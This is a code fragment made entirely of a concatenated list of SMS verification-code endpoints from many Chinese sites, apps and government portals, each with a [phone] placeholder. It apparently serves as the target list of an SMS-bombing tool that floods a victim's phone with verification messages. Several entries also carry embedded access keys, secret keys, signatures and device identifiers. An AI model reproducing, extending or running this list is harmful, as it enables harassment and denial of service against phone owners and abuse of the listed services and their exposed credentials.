"http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]&deviceId=p_1584518586025_48072460278550296&terminal=PC&channel=208000103005&uuid=0e2a64ae-e07e-49d6-852e-3de883df8003&imgCode=&format=jsonp&_=1584518959802", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", + "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1575815921608", + "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://weizhang.58.com/user/login/getcode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://api.taoelement.vip/account/sms/sms/captcha/[phone]/mineTker", + "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", + "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]&sign=d012c7dbfeba6014a28b9093156cd52d&ts=1565428712975901&type=1", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", + "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]", + "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&captcha_code=0722&_=1430461129948&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://uc.maodou.com/server/account/sendLoginCode?phone=[phone]", + "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", + "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", + "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", + "http://www.super8.com.cn/Ajax/HotelInterface.ashx?action=sendmsg&mobile=[phone]", + "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", + "http://weizhang.58.com/user/login/getcode?mobile=[phone]", + "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", + "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", + "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", + "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", + "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", + "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=0", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", + "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", + "https://api.aihecong.com/account/vercode?type=register&antiBrush=ecdfddd24937106ex&callback=JSONP_1580388414994&tel=[phone]", + "http://106.12.43.240/api.php?act=user&key=m898F3fn4rf53j643T42&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", + "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://reg.suning.com/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?publishid=1003&deviceId=2808ec7ef7fbeed6&df=android&vt=5&screen=1080x1920&deviceid=2808ec7ef7fbeed6&proid=qknode&os=android&av=NMF26X&appVersion=1.4.0&imei=865499038835144&ov=7.1.1&osVersion=7.1.1&osLevel=25&phone=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", + "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", + "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", + "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", + "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]&type=1", + "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", + "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.super8.com.cn/Ajax/HotelInterface.ashx?action=sendmsg&mobile=[phone]", + "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", + "http://user.tgbus.com/api/action.ashx?callback=callback10491710835861462&t=sendsms&format=json&Action=0&phone=[phone]", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", + "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://bank.wo.cn/wxun/api/my/getSmsCode?mobile=[phone]", + "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", + "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]&sendType=1&tokenType=6&_t_=1573784070671&os=pcweb&appId=homework&channel=&plat=wap&cType=pc&fr=&lastfrom=&name=JC_C2_3_20100", + "https://api.taoelement.vip:443/account/sms/sms/captcha/[phone]/mineTker", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8,1&form.phoneNumber=[phone]&form.phoneType=1&fo", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=103", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]&_=1523359575414", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://www.xd.com/users/sendRegisterCode?callback=jQuery110201470901275837977_1591599902822&mobile=[phone]&area_code=86&_=1591599902823", + "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", + "http://user.daojia.com/mobile/getcode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://xiangpai.jishiyuanwl.cn/api/public/?service=Login.GetCode0&mobile=[phone]&sign=2019&type=0", + "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://dxhz.xqapi.live/api.php?id=[phone]", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://open.leju.com/game/member/sendcode.html?phone=[phone]", + "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + 